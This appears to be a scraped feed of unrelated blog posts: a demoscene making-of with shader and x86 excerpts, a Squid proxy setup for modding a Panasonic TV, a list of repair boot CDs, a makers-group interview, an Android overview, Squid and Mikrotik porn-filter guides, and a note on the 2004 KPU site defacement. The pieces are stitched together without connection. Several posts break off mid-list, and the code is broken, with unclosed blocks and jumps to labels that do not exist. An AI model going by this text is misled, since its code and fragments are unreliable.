Finally, I wanted to use the texture to make a kind of lava sea with a snake moving on it... That was the last scene I coded (along with, of course, 2 other scenes that are too ugly to show here! :) ).

We also started working on the music at that time, in February, and as I explained in my earlier posts, we used the 4klang synth for the intro. But with all those scenes and a music prototype, the "crinklered" compressed exe was already around 5 KB... even though the shader code was already size-optimized, using some kind of preprocessor templating (as in rudebox or receptor). The intro was of course lacking a clear direction, there were no transitions between the scenes... and most importantly, it was not possible to fit all those scenes in 4k while expecting the music to grow a bit more in the final exe...

The story of the Worm-Lava texture

Last year, around November, while playing with several Perlin-like noises, I found an interesting variation using Perlin noise and the marble-cosine effect that could represent a kind of worms: quite freakishly ugly in some way, but a unique texture effect!

(Click to enlarge, lots of details in it!)

This texture was primarily developed in C#, but the code was quite straightforward to port to a texture shader. Yep, that's probably an old D3D9 trick: using the function D3DXFillTextureTX to fill a texture directly from a shader with a single line of code. Why use this? Because it was the only way to get a noise() function accessible from a shader without having to implement it. As weird as it may sound, the HLSL Perlin noise() function is not accessible outside a texture shader. A huge drawback of this method is that the shader is not a real GPU shader but is instead computed on the CPU... which explains why the ergon intro takes so long to generate the texture at startup (at a 1280x720 texture resolution, for example).

So what does the texture shader that generates this texture look like?
// -------------------------------------------------------------------------
// worm noise function
// -------------------------------------------------------------------------
#define ty(x,y) (pow(.5+sin((x)*y*6.2831)/2,2)-.5)
#define t2(x,y) ty(y+2*ty(x+2*noise(float3(cos((x)/3)+x,y,(x)*.1)),.3),.7)
#define tx(x,y,a,d) ((t2(x, y) * (a - x) * (d - y) + t2(x - a, y) * x * (d - y) + t2(x, y - d) * (a - x) * y + t2(x - a, y - d) * x * y) / (a * d))

float4 x( float2 x : position, float2 y : psize) : color {
float a=0,d=64;
// Modified FBM functions to generate a blob texture
a += abs(tx(x.x*d,x.y*d,d,d)/d);
return a*2;
}

The tx macro basically applies tiling to the noise.
The core t2 and ty macros are the ones that generate this "worm noise". It's in fact a tricky combination of the usual cosine Perlin noise: instead of something like cos(x + noise(x,y)), I have something like special_sin(y + special_sin(x + noise(cos(x/3)+x, y), power1), power2), with a special_sin function like ((1 + sin(x*power*2*PI))/2)^2.

Also, don't be afraid... this formula didn't come out of my head like this. It was reached after lots of permutations of the original function, with lots of run/stop/change-parameters iterations! :D

Music and synchronization

It took some time to build the music theme and be satisfied with it... At the beginning, I let ulrick make a first version of the music, but because I had a clear view of the design and direction, I was expecting a very specific progression in the tune and even in the chords used. That was really annoying for ulrick (excuse me, my friend!), as I was very intrusive in the composition process... At some point, I ended up making a 2-pattern example of what I wanted in terms of chords and musical ambiance... and ulrick was kind enough to take this sample pattern, and clever enough to add some of the intro's musical feeling to it. He can talk about this better than me, so I'll ask him to insert a small explanation here!

ulrick here: « Working with @lx on this prod was a very enjoyable job. I started a piece of music which @lx did not like very much; it did not reflect the feelings that @lx wanted to convey through ergon. He thus composed a few patterns using a very emotional musical scale. I got into the music very easily and added my own stuff. For the anecdote, I added a second scale to the music to allow for a clearer transition between the first and second parts of ergon. After doing so, we realized that our music actually used the chromatic scale on E »

The synchronization was the last part of the work on the demo. I first used the default synchronization mechanism from 4klang... but I was lacking some features: if the demo was running slowly, I needed to know exactly where I was. Using plain 4klang sync, I was missing some events on slow hardware, which even prevented the intro from switching between scenes, because the switching event was missed by the rendering loop!

So I wrote my own small synchronization, based on the regular events of the snare and a reduced view of the sample patterns for those particular events. This is the only part of the intro that was developed in x86 assembler, in order to keep it as small as possible.

The whole code was something like this :
static float const_time = 0.001f;
static int SMOOTHSTEP_FACTOR = 3;

static unsigned char drum_flags[96] = {
// pattern n° time z.z sequence
1,1,1,1, // pattern 0 0 0 0
1,1,1,1, // pattern 1 7,384615385 4 1
0,0,0,0, // pattern 2 14,76923077 8 2
0,0,0,0, // pattern 3 22,15384615 12 3
0,0,0,0, // pattern 4 29,53846154 16 4
0,0,0,0, // pattern 5 36,92307692 20 5
0,0,0,0, // pattern 6 44,30769231 24 6
0,0,0,0, // pattern 7 51,69230769 28 7
0,0,0,1, // pattern 8 59,07692308 32 8
0,0,0,1, // pattern 8 66,46153846 36 9
1,1,1,1, // pattern 9 73,84615385 40 10
1,1,1,1, // pattern 9 81,23076923 44 11
1,1,1,1, // pattern 10 88,61538462 48 12
0,0,0,0, // pattern 11 96 52 13
0,0,0,0, // pattern 2 103,3846154 56 14
0,0,0,0, // pattern 3 110,7692308 60 15
0,0,0,0, // pattern 4 118,1538462 64 16
0,0,0,0, // pattern 5 125,5384615 68 17
0,0,0,0, // pattern 6 132,9230769 72 18
0,0,0,0, // pattern 7 140,3076923 76 19
0,0,0,1, // pattern 8 147,6923077 80 20
1,1,1,1, // pattern 12 155,0769231 84 21
1,1,1,1, // pattern 13 162,4615385 88 22
};

// Calculate time, synchro step and boom shader variables
__asm {
fild dword ptr [time] // st0 : time
fmul dword ptr [const_time] // st0 = st0 * 0.001f
fstp dword ptr [shaderVar.x] // shaderVar.x = time * 0.001f
mov eax, dword ptr [MMTime.u.sample]
jae not_first_drum
xor eax,eax
idiv dword ptr [SAMPLES_PER_DRUMS] // eax = drumStep , edx = remainder step
mov dword ptr [drum_step], eax
fild dword ptr [drum_step]
fstp dword ptr [shaderVar.z] // shaderVar.z = drumStep

not_end: cmp byte ptr [eax + drum_flags],0
jne no_boom

sub eax,edx
jae boom_ok
xor eax,eax
mov dword ptr [shaderVar.y],eax
fild dword ptr [shaderVar.y]
fidiv dword ptr [SAMPLES_PER_DROP_DRUMS] // st0 : boom
fild dword ptr [SMOOTHSTEP_FACTOR] // st0: 3, st1-4 = boom
fsub st(0),st(1) // st0 : 3 - boom , st1-3 = boom
fsub st(0),st(1) // st0 : 3 - boom*2, st1-2 = boom
fmul st(0),st(1) // st0 : boom * (3-boom*2), st1 = boom
fmulp st(1),st(0)
fstp dword ptr [shaderVar.y]

That was smaller than what I was able to achieve with pure 4klang sync... with the drawback that the sync was probably too simplistic... but I couldn't afford more code for the sync, so...

Final mixing

Once the music was almost finished, I spent a couple of days working on the transitions, sync, and camera movements. Because it was not possible to fit all 4 scenes, I had to merge scene 3 (the raptor) and scene 4 (the snake and the lava sea), and found a way to make the transition through a "central brain". Ulrick wanted a different music style for the transition, and I was not confident about it... until I put the transition in action, letting the brain collapse while the space under it was dug out all around... and the music fit very well! Cool!

I also used a single big shader for the whole intro, with some if (time < x) then scene_1 else scene_2, etc. I didn't expect to do this, because this kind of branching hurts performance in the pixel shader... but I was really running out of space, and the only solution was in fact to use a single shader with some repetitive code. Here is an excerpt from the shader code: you can see how scene and camera management was done, as well as the lights. This part compressed quite well due to its repetitive pattern.
// -------------------------------------------------------------------------

// t3

// Helper function to rotate a vector. Usage :

// t3(mypoint.xz, .7); <= rotate mypoint around Y axis with .7 radians
// -------------------------------------------------------------------------
float2 t3(inout float2 x,float y){
return x=x*cos(y)+sin(y)*float2(-x.y,x.x);
}

// -------------------------------------------------------------------------
// v : main raymarching function
// -------------------------------------------------------------------------
float4 v(float2 x:texcoord):color{
float a=1,b=0,c=0,d=0,e=0,f=0,i;
float3 n,o,p,q,r,s,t=0,y;
int w;
r=normalize(float3(x.x*1.25,-x.y,1)); // ray
x = float2(.001,0); // epsilon factor

// Scene management
if (z.z<39) {
w = (z.z<10)?0:(z.z>26)?3+int(fmod(z.z,5)):int(fmod(z.z,3));

if (w==0) { p=float3(12,5+30*smoothstep(16,0,z.x),0);t3(r.yz,1.1*smoothstep(16,0,z.x));t3(r.xz,1.54); }
if (w==1) { p=float3(-13,4,-8);t3(r.yz,.2);t3(r.xz,-.5);t3(r.xy,sin(z.x/3)/3); }
if (w==2) { p=float3(0,8.5,-5);t3(r.yz,.2);t3(r.xy,sin(z.x/3)/5); }
if (w==3) {
t3(r.yz, sin(z.x/5)*.6);
t3(r.xz, 1.54+z.x/5);
t3(r.xy, cos(z.x/10)/3);

if (w == 4) {
t3(r.yz, sin(z.x/5)/5);
t3(r.xz, 1.54+z.x/3);
t3(r.xy, sin(z.x/10)/3);

if (w > 4) {
t3(r.yz, 1.54*sin(z.x/5));
t3(r.xz, .7+z.x/2);
t3(r.xy, sin(z.x/10)/3);
} else if (z.z<52) {
t3(r.yz, .9);
t3(r.xz, 1.54+z.x/4);
} else if (z.z<81) {
w = int(fmod(z.z,3));
if (w==0 ) {
t3(r.yz, sin(z.x/5)/5);
t3(r.xz, 1.54+z.x/3);
t3(r.xy, sin(z.x/10)/3);
if (w==1 ) {
t3(r.yz, 1.1);
t3(r.xz, z.x/4);
if (w==2 ) {
t3(r.yz, sin(z.x/5)/2);
t3(r.xz, 1.54+z.x/5);
t3(r.xy, cos(z.x/10)/3);
} else {

// Boom effect on camera

// Lights
static float4 l[6] = {{.7,.2,0,2},{.7,0,0,3},{.02,.05,.2,7},

Compression statistics

Final compression results are summarized below:

So to summarize, the total exe size is 4070 bytes, composed of:
  • Synth code + music data: around 35% of the total exe size = 1461 bytes
  • Shader code: 36% = 1467 bytes
  • Main code + non-shader data: 14% = 549 bytes
  • PE header + Crinkler decoder + Crinkler import: 15% = 593 bytes

The intro was finished around the 13th of March 2010, well ahead of BP2010. So that was damn cool... I spent the rest of my time until BP2010 trying to develop a procedural 4k gfx entry, using D3D11 compute shaders, raymarching, and a global illumination algorithm... but the results (the algo was finished during the party) disappointed me. And when I saw the fantastic Burj Babil by Psycho, he was right about using a plain raymarcher without any complicated true light management... a good "basic" raymarching algo, with some tone-mapping fine-tuning, was much more relevant here!

Anyway, my GI experiment on the compute shader will probably deserve an article here.

I really enjoyed making this demo and seeing ergon make it into the top 3... After seeing BP2009, I was not at all expecting the intro to reach the top 3!... although I know that the competition this year was far easier than at the previous BP!

Anyway, it was nice to work with my friend ulrick... and to contribute to the demoscene with this prod. I hope I will be able to keep working on demos like this... I still have lots of things to learn, and that's cool!
          Setting up a Development Environment        
In order to do any development, you need a development environment. How you choose to set up yours is up to you; below I will detail how I did mine. Whichever way you choose, you need to do 4 things:
  • Provide a web server to serve up your modified content.
  • Create a web proxy server to redirect access to your web server.
  • Point your Panasonic device to your web proxy.
  • Download and host content from Panasonic's Viera Cast servers and modify them to your needs. This will be covered in the next post.
For my current environment I'm using Ubuntu Linux, since it provides a full set of features including Apache 2 (web server) and Squid (web proxy). In future I intend to replicate this setup on my Western Digital MyBook World (NAS unit), which has a much smaller power footprint and is always on. In theory the same should be possible on other customisable NAS units (Synology, Q-NAP et al.).

Web Server

The web server I use is Apache 2. For development purposes I'm using a bog-standard out-of-the-box installation. In Ubuntu this serves pages from /var/www on port 80.

Web Proxy

The web proxy I'm using is Squid (default port 3128). I modified its configuration slightly (by editing /etc/squid/squid.conf) to minimize the footprint, as follows:
  • Add "http_access allow all" (bad practice but this is development in my own home - You need to add something that lets your TV/device and development PC access the proxy).
  • Add "cache_dir null /tmp" and "maximum_object_size 0 KB" (to disable disk cache - we only care about the URL redirection features so this saves space).
  • Add "useragent_log /var/log/squid/useragent.log" (the reason will become clear soon).
  • Add "url_rewrite_program /etc/squid/mirror_and_redirect.sh" (this points to a redirect script we will create)
I then created a URL rewrite program called /etc/squid/mirror_and_redirect.sh (and made it executable) containing the following:


#!/bin/sh
while read url rest; do
  filename=`echo $url | sed 's^http://^^g' | sed 's^?.*^^g'`
  if [ -f /var/www/$filename ]; then
    # We found a matching local file to replace, so redirect to it and log the redirect.
    echo "http://localhost/$filename"
    echo "http://localhost/$filename" >> /var/log/squid/mirror_and_redirect.log
  else
    # No match, so don't modify the URL and log the URL.
    echo "$url"
    echo "$url" >> /var/log/squid/mirror_and_redirect.log
  fi
done
The purpose of this script is as follows. Every HTTP request passed via our proxy is parsed by the script and compared against the contents of /var/www. If a matching file exists, the script rewrites the URL to http://localhost/our_replacement_file, redirecting the client (i.e. the Panasonic device) to our local modified file. It logs all this information to mirror_and_redirect.log so we can see what's been served locally and what's been passed through.

Configure TV

Finally I configured my TV to access the web via the proxy. On my Panasonic G20 Plasma this is accessed under Menu...Setup...Network Setup...Proxy Settings. I set the address to the IP address of my Ubuntu server and port to 3128 (Squid). How you do yours depends on what you've got. If you can't figure it out, you probably shouldn't go any further :D

Assuming Squid is now working, Viera Cast should work as normal on your device. And now the fun begins...
          List of Downloadable Computer Repair CDs        
Sometimes you're unlucky enough that your computer crashes without you having any kind of backup. It's not your fault (until you accept sole responsibility :D), but the situation is a miserable one. I say this because quite a few years ago I faced a very similar problem and lost GBs of very important, much-loved data in a flash. Sour memories, and I surely don't want that to happen to any of us. So, I've compiled a large list of CDs for various computer repair tasks. The following types of CD are available for download: Antivirus Boot CDs, Recovery Disks, Hardware Diagnostic Boot CDs, Network Testing/Monitoring, Data Recovery Boot CDs and Special Purpose CDs.

Some of these are free to download, some are not. Be sure to read the EULA for the CDs you download and for the applications you use, to make sure you're allowed to use them in the way you plan to. Many of the CDs contain a variety of different programs; some of the applications are free to use as you please, but some disallow commercial use. So be sure to read and abide by the EULA for whatever you use.
Also, some of these CDs may trigger antivirus false positives due to their virus-removal, password-cracking, system-file-changing nature. Kon-Boot is one such CD that will set off antivirus software. It's best to scan any CD that trips your antivirus with a site like VirusTotal.com and make your own decision.

Antivirus Boot Disks

Avira AntiVir Rescue System
BitDefender Rescue CD
Dr Web Live CD
F-Secure Live CD
Kaspersky Antivirus Live CD
VBA32 VirusBlokAda (Russian)
PC Tools Alternate Operating System Scanner (AOSS)
Avast BART CD
GData (British)
AVG Rescue CD
ClamAV Live CD
Open Diagnostics Live CD

General Purpose Recovery Disks

FREE UBCD4Win Ultimate Boot CD for Windows
FREE UBCD Ultimate Boot CD
FREE Trinity Rescue CD
FREE System Rescue CD (x86)
FREE System Rescue CD (Sun SPARC)
FREE System Rescue CD (PowerPC/Mac)
FREE Windows Vista Recovery Disk (32-bit / Microsoft)
FREE Windows Vista Recovery Disk (64-bit / Microsoft)
FREE Windows 7 Recovery Disk (Microsoft)
FREE INSERT (Inside Security Rescue Toolkit)
FREE Microsoft ERD/DaRT 2009
FREE Bootzilla for Windows

Hardware Diagnostic Boot CDs

FREE Inquisitor (hardware testing software)
FREE Inquisitor 64
FREE Microsoft Memory Diagnostic

Network Security Testing / Monitoring

FREE Network Security Toolkit
FREE BackTrack (network penetration testing)
FREE Knoppix STD (Security Tools Distribution)
FREE nUbuntu (network penetration testing)

Data Recovery Boot CDs

FREE RIP (Recovery Is Possible)
Helix (computer forensics / electronic discovery / incident response)
CAINE (Computer Aided Investigative Environment)
MacQuisition (CF forensics for Macs)
The Farmer's Boot CD
Puppy Linux

Special Purpose Boot CDs

FREE Samurai Web Application Testing
FREE Offline NT Password & Registry Editor
FREE PC CMOS Cleaner
FREE Parted Magic
FREE Partition Wizard (contrib. IISJMAN)
FREE Ping (backup / restore HD images across the network)
FREE Incognito (completely anonymous web everything)

Other CDs of Interest:

Some CDs have been purposely left out of this list as they contain illegal software.


          Top 10 Must watch videos for Entrepreneurs.        
Being an entrepreneur shows a person's real guts. Not only does it indicate talent and real brainpower, it also reveals the struggle. Obviously, becoming a successful entrepreneur is not a cakewalk; it takes tough decisions and hard work, and you have to be audacious.
Here are the 10 best YouTube videos on becoming a successful entrepreneur; they will surely help with any problem you come across on your way.

1. Developing a CEO within you






Visual Studio Code

Markdown Live Preview

I didn't choose Visual Studio Code because I didn't want to install an IDE just to write Markdown, and I didn't choose Markdown Live Preview because its input and preview panes are too narrow.

          Uninstalling Linux without breaking Windows        

Often we want to uninstall Linux without breaking Windows when we have a dual boot, and what happens when we delete the Linux partition is that we wipe out GRUB (Linux's boot loader) and are left with no boot loader at all, so the Windows we had no longer starts. Sometimes when we have Windows and [...]

The post Desinstalar Linux sin romper Windows appeared first on Victor Robles.

          How to make a multiboot USB with RMPrepUSB, Easy2Boot and YUMI Linux        

What is a multiboot USB? A multiboot USB is a pendrive that lets us carry several operating systems on it, ready to be installed or used live, so that when we have to install operating systems, recover data, or do anything else that requires booting a system from a [...]

The post Como hacer un USB Multibooteable con RMPrepUSB, Easy2Boot y Yumi Linux appeared first on Victor Robles.

          Thoughts for ArtServe Interview        
Computer interface in a shoe box.

Today I had an interview with Jennifer Baum, a writer for ArtServe Michigan. They're doing an article on the Kalamazoo Makers Guild meetup group. In preparation for our discussion Jennifer was kind enough to supply me with some topics we might discuss and I jotted down some notes while I thought about what I would say. Here are those notes and roughly what I said.
About Kalamazoo Makers Guild...

The Kalamazoo Maker's Guild is a group of people interested in DIY technology, science and design. We more or less pattern ourselves after the Homebrew Computer Club that founded Silicon Valley. Like them, our members tend to have some background in a related profession, but that's by no means a prerequisite. This group is about the things we do for fun, because they interest us, and anybody can be interested in making stuff. We meet every couple of months, report on the status of our various projects and sometimes listen to a presentation or hold an ad hoc roundtable on a topic that catches our interest. "Probably the most useful aspect of the group is that you start to feel accountable to the other members of the group and you're motivated to make progress on your project before the next meeting."

How did it get started...

When I gave up my web design business I ended the professional graphic design association I'd formed on Meetup.com, and then I had room on the service to start another group. MAKE magazine had really caught my attention. I did a few projects from the magazine and thought it would be fun and helpful to know other people who were working on the same kinds of things. The group didn't get going, though, until about 8 months ago when Al Hollaway from the       posted to an online forum about RepRap 3D printers at the same time I was building one. He wanted to meet and talk about RepRap. I told him about my Meetup group. We joined forces and here we are.


Meetup.com is a great web site because it's a web service that's all about meeting people nearby in person to share a common interest.

About membership and kinds of projects ...

The group is growing steadily now. We have twenty-something members and we're seeing membership tick up at an increasing rate month to month. We have a high school student who is working on designing assistive devices for the blind using sonic rangefinders; one member who last meeting showed off a prototype of a computer interface built into a shoe box; and another member who is on the verge of completing a working DIY Segway (the self-balancing scooter) made using a pair of battery-powered drills for motors. Al should be done with his RepRap 3D printer and I've just finished my 2nd. At least two other members are in some stage of building their own 3D printers. I'm building both a laser etcher and a 3D scanner right now, and I'm excited to start playing with the products of a couple of Kickstarter projects I've backed. There are a few of us about to start building CNC milling machines, and there's been a lot of excitement in the group around the brand new, hard-to-get Raspberry Pi (a $25 computer). Almost all the members so far have dabbled in a bit of Arduino hacking. One member is designing a flame thrower for Burning Man. Another is making a calibration device for voltage meters. So, there's a range of things going on.

Where do I see this headed....

Our approach to this group has been to learn from the mistakes other groups have made. All of the other groups I've seen in Kalamazoo start out with facilities and try to bring in members to support and justify it. Getting people to work on actual projects that interest them is something that comes later down the road. It's the, "if you build it they will come" approach. Those groups quickly get into trouble managing the building and funding, and they go away. We're coming at it from the opposite direction. We're gathering together a community of makers first, people who are already doing things on their own. Once we reach a tipping point then we'll worry about the next step, like getting a hackerspace put together. That kind of bottom-up approach is, I think, much more sustainable and durable, and it fits in with our modern culture (particularly in the maker subculture.)  It was good enough for Homebrew, so it's good enough for us.

About impact...

Silicon Valley came out of a group like this, so the potential is there for us to have a big impact on the community. Being a college town we have access to a lot of smart people, and Kalamazoo has a strong progressive, energetic, entrepreneurial vibe going on. I think what's more likely, though, is that we will have an impact in aggregate with all the other makers--groups and individuals--around the globe.

"Makers aren't just hacking new technologies, we're hacking a new economy. We're trying to figure out how to live in a world without scarcity."

The unsung official slogan of the RepRap project is, "wealth without money."

I don't know that another story like Apple is likely to happen again. Steve Jobs relied on a very traditional, very closed model for his business, as did most of the people of that era who went on to make a name for themselves in technology. The ethos of that time was centered around coming up with a big idea and capitalizing on that idea to the exclusion of the competition. It's interesting that even then this view was at odds with that of his partner, Steve Wozniak, who was content to build computers in his garage and share what he learned with his friends at Homebrew. In this way Wozniak was much more like the modern maker/hacker and is probably one of this hobby's forefathers.

Makers/hackers today are all about open-ness and sharing -- not in a hippy, touchy-feely kind of way, but in a calculated way that weighs the costs and benefits of being open verses closed. The success of Linux and the ever increasing number of open source software, and now hardware, projects has proven that there's enormous power in being open. "We tend to think that's the way to change the world."

About the Maker Movement....

I know there are a lot of people who are keen to talk about the "maker movement" but I'm not so sure that I would characterize it as a movement. If it is, then it started in the 60's with people like my dad who were HAM radio enthusiasts and tinkered around with making their own radios and antennas. I think that what we're observing and calling a movement is really an artifact of reaching the steep part of Moore's Law. Ray Kurzweil is famous for talking about this phenomenon. The pace of advances in technology is itself accelerating, it's exponential, and moving so fast now that if you're not paying close attention things seem to pop out of nowhere. For makers, technology has reached a point where Moore's Law has forced down prices and increased the availability of things that just a few years ago were far out of reach. We're just taking those things and running with it. In effect, we're just the people paying close attention.

About me...

I started college in the engineering program at WMU, but I couldn't hack it and dropped out. I went back to community college and got a degree in graphic design. In my professional life I've been paid to be a web designer, photographer, videographer, IT manager, technical document writer, photo lab manager, artist, and I've even been paid to be a poet. For fun I do all those things and also play guitar, peck at a piano, and watch physics and math lectures from the MIT OpenCourseWare web site, do exercises on Khan Academy, play board games and roleplaying games, and commit acts of crafting -- woodworking and model making. For work, I now teach at the Kalamazoo Institute of Arts. I've taught web design, digital illustration and this fall I'll be teaching classes in 3D modeling and 3D printing with the RepRap 3D printer I have on loan there. I live near downtown Kalamazoo with my wife and many pets, including a 23 year old African Grey parrot named KoKo.

Post interview notes...

I mentioned SoliDoodle, the fully assembled, $500 3D printer. The big hackerspace in Detroit is called i3detroit. Also, Chicago has Pumping Station: One. I'm on the forums for both and will be visiting each this summer. The presentation about 3D scanning we had was from Mike Spray of Laser Abilities. You can actually see the entire presentation on my YouTube channel. Thingiverse was the web site that I kept going on about where you can find 3D designs for printing.

Android handsets are increasingly popular worldwide and are serious competition for established phone vendors such as Nokia, BlackBerry and iPhone.
But if you ask the average Indonesian "What is Android?", most people will not know, and those who do tend to be the few who are geeks or keep up with technology.
This is because most Indonesians only know 3 phone brands: BlackBerry, Nokia, and "other brands" :)

There are several things that have made Android hard for the Indonesian market to accept (so far), among them:

  • Most Android phones use touchscreen input, which is not very popular in Indonesia;
  • Android needs a very fast internet connection to be used to its full potential, whereas the internet provided by Indonesian mobile operators is not very reliable;
  • And finally, the perception that Android is harder to operate and use than other phones such as Nokia or BlackBerry.

What is Android

Android is an operating system used on smartphones and tablet PCs. It plays the same role as Symbian on Nokia, iOS on Apple devices, and BlackBerry OS.
Android is not tied to a single phone brand; well-known vendors already using Android include Samsung, Sony Ericsson, HTC, Nexus, Motorola, and others.
Android was originally developed by a company called Android Inc., which was acquired in 2005 by the internet giant Google. Android is built on a modified Linux kernel, and each release is codenamed after a food dish.
Android's main advantage is that it is free and open source, which lets Android smartphones sell for less than a BlackBerry or iPhone even when the (hardware) features Android offers are better.
Some of Android's main features include WiFi hotspot, multi-touch, multitasking, GPS, accelerometers, Java support, and support for many network types (GSM/EDGE, iDEN, CDMA, EV-DO, UMTS, Bluetooth, Wi-Fi, LTE & WiMAX), along with the usual basic phone capabilities.

Android Versions in Circulation Today

Eclair (2.0 / 2.1)

An early Android version adopted by many smartphones. Eclair's main changes were a complete overhaul of the structure and look of the user interface, and it was the first Android version to support HTML5.

Froyo / Frozen Yogurt (2.2)

Android 2.2 was released with 20 new features, among them speed improvements, Wi-Fi hotspot tethering, and support for Adobe Flash.

Gingerbread (2.3)

The main changes in version 2.3 include a UI refresh, improvements to the soft keyboard & copy/paste, better power management, and support for Near Field Communication.

Honeycomb (3.0, 3.1 and 3.2)

An Android version aimed at gadgets / devices with large screens such as tablet PCs; Honeycomb's new features were support for multicore processors and hardware-accelerated graphics.
The first tablet to ship with Honeycomb was the Motorola Xoom, released in February 2011.
Google decided to temporarily close access to the Honeycomb source code, to prevent phone makers from installing Honeycomb on smartphones.
With earlier Android versions, many companies had put Android onto tablet PCs in ways that gave users a poor experience and left Android with a bad image.

Ice Cream Sandwich (4.0)

Android 4.0 Ice Cream Sandwich was announced on 10 May 2011 at the Google I/O Developer Conference (San Francisco) and officially released on 19 October 2011 in Hong Kong. Android Ice Cream Sandwich can be used on both smartphones and tablets. The main features added in Android 4.0 are Face Unlock, Android Beam, a major user-interface overhaul, and a native screen resolution of 720p (high definition).

Android Market Share

Around 630 million smartphones are expected to be sold worldwide in 2012, of which an estimated 49.2% will run the Android OS.
Google's current figures record 500,000 Android handsets being activated every day around the world, a number that keeps growing by 4.4% per week.

Platform                      | API Level | Distribution
Android 3.x (Honeycomb)       | 11        | 0.9%
Android 2.3.x (Gingerbread)   | 9-10      | 18.6%
Android 2.2 (Froyo)           | 8         | 59.4%
Android 2.1 (Eclair)          | 5-7       | 17.5%
Android 1.6 (Donut)           | 4         | 2.2%
Android 1.5 (Cupcake)         | 3         | 1.4%
Worldwide Android version distribution as of June 2011

Android Applications

Android has a large developer base building applications, which makes Android's functionality broader and more varied. The Android Market, managed by Google, is where Android applications, both free and paid, are downloaded.
Although not recommended, Android's performance and feature set can be extended further by rooting the device. Features such as wireless tethering, wired tethering, uninstalling crapware, overclocking the processor, and flashing custom ROMs become available on a rooted Android.

          Blocking Porn Sites        

Blocking porn sites is not difficult. In general there are two (2) techniques, namely:
• Installing a filter on the user's PC.
• Installing a filter on the server connected to the Internet.

The first technique, installing a filter on the user's PC, is usually applied by parents on the home PC so that children cannot surf to unwanted sites. A full list of filters and child-friendly browsers for home use can be found at
http://www.yahooligans.com -> parent's guide -> browser's for kids.
http://www.yahooligans.com -> parent's guide -> blocking and filtering.

Some fairly well-known filters include
Net Nanny, http://www.netnanny.com/
I Way Patrol, http://www.iwaypatrol.com/

Of course, this kind of filtering is really only an option for parents at home with children who do not yet know the Internet well. For a school with Internet facilities, the techniques above are hard to apply. The most efficient way to block porn sites there is to install a filter on the proxy server used by the WARNET (internet café) / office to access the Internet jointly from a Local Area Network (LAN). The second (2) technique, installing the filter on the server, is not difficult either. Some commercial content-filtering packages include:


Perhaps the hardest part is actually obtaining a complete list of the sites that need to be blocked; the filter needs that list to know which sites to block. Lists of hundreds of thousands of sites to block can be downloaded for free, for example at:


For schools and offices, the open source (Linux) alternative may be attractive since it involves no pirated software. On Linux, one of the most popular proxy packages is Squid (http://www.squid-cache.org), which can usually be installed along with the Linux installation itself (both Mandrake and RedHat).

Setting up filtering in Squid is not difficult; we only need to add a few lines to the file /etc/squid/squid.conf. For example:

acl sex url_regex "/etc/squid/sex"
acl notsex url_regex "/etc/squid/notsex"
http_access allow notsex
http_access deny sex
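As an illustration of what these two regex files might contain (hypothetical patterns, not taken from the original article), each file holds one regular expression per line, matched against requested URLs. Example contents of /etc/squid/sex (URLs matching any line are denied):

```
porn
adult
```

Example contents of /etc/squid/notsex (exceptions allowed by the earlier http_access line, so legitimate sites are not caught by the broad patterns):

```
sexual.health
education
```

After editing squid.conf or the regex files, reload Squid with `squid -k reconfigure` so the ACLs take effect.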

create the file /etc/squid/sex

example contents of /etc/squid/notsex:

example contents of /etc/squid/sex:


Blacklists obtained from SquidGuard and the like can easily be added to the lists above. Shown below is the Access Control List (ACL) section of /etc/squid/squid.conf that I set up on my server at home:

acl sex url_regex "
acl notsex url_regex "
acl aggressive url_regex "
acl drugs url_regex "
acl porn url_regex "
acl ads url_regex "
acl audio-video url_regex "
acl gambling url_regex "
acl warez url_regex "
acl adult url_regex "
acl dom_adult dstdomain "
acl dom_aggressive dstdomain "
acl dom_drugs dstdomain "
acl dom_porn dstdomain "
acl dom_violence dstdomain "
acl dom_ads dstdomain "
acl dom_audio-video dstdomain "
acl dom_gambling dstdomain "
acl dom_proxy dstdomain "
acl dom_warez dstdomain "

http_access deny sex
http_access deny adult
http_access deny aggressive
http_access deny drugs
http_access deny porn
http_access deny ads
http_access deny audio-video
http_access deny gambling
http_access deny warez
http_access deny dom_adult
http_access deny dom_aggressive
http_access deny dom_drugs
http_access deny dom_porn
http_access deny dom_violence
http_access deny dom_ads
http_access deny dom_audio-video
http_access deny dom_gambling
http_access deny dom_proxy
http_access deny dom_warez

With the setup above I block not only porn sites but also sites related to drugs, violence, gambling and so on. All the data comes from the blacklist files at www.squidguard.org.


Blocking Sites in Mikrotik via Winbox

1. Open Winbox from the desktop.

2. Click the ( ... ) button, or enter the Mikrotik address in the Connect To: field.

3. A window like the one below will appear; choose one of the entries.

4. Then fill in the Mikrotik username and password.

5. Click Connect.

6. The Mikrotik window opens, as in the image below.

7. To block a site, open the IP menu and choose Web Proxy.

8. Then configure the Web Proxy by clicking the Settings button.

9. A window like the one below will appear.
Configure the Web Proxy as shown, then click OK.

10. Now create the rule for the website to be blocked. Click ( + ).
A window will appear; configure it as shown below.

11. Click OK, and the rule appears in the Web Proxy window.

12. Test the configuration by typing the word "porno" into Google.

13. Press Enter; if you see a page like the one below, your site block is working.
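For those who prefer the RouterOS terminal over the Winbox GUI, the same block can be sketched with the `/ip proxy` commands below. This is an assumption based on the classic RouterOS web-proxy access list; verify the exact syntax against your RouterOS version's documentation:

```
/ip proxy set enabled=yes port=8080
/ip proxy access add dst-host=*porno* action=deny comment="block porn keyword"
```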


Cybercrime is a term that refers to criminal activity in which a computer or computer network is the tool, the target, or the scene of the crime. Cybercrime includes online auction fraud, check forgery, credit card fraud / carding, confidence fraud, identity fraud, child pornography, and so on.

Although cybercrime generally refers to criminal activity with a computer or computer network as its main element, the term is also used for traditional crimes in which a computer or network is used to facilitate or enable the offense.

Examples of cybercrime where the computer is the tool are spamming and offenses against copyright and intellectual property. Examples of cybercrime where the computer is the target are illegal access (defeating access controls), malware and DoS attacks. An example of cybercrime where the computer is the scene is identity fraud. And examples of traditional crime with the computer as a tool are child pornography and online gambling.


During the 2004 general election there was a case that caused quite a stir and hit the KPU, the institution running the election, hard. On 17 April 2004 the KPU website was defaced: the names of the parties contesting the election were changed to joke names, although the vote tallies were not altered. The defacement was carried out by a 25-year-old named Dani Firmansyah, an International Relations student at Universitas Muhammadiyah Yogyakarta.

The police initially had trouble tracing the perpetrator, all the more so because cases like this were new to them. Early in the investigation the police were briefly misled because the perpetrator had redirected his internet protocol (IP) address through Thailand, but with persistent effort they caught the suspect after cooperating with several parties, including the Indonesian Internet Service Providers Association (APJII) and the internet service provider (ISP) involved.

It later emerged that the suspect's motive was to show how poor the KPU's performance was, especially in information technology; that did not justify the act, and the perpetrator was prosecuted under the applicable law.

          3D ANIMATION        

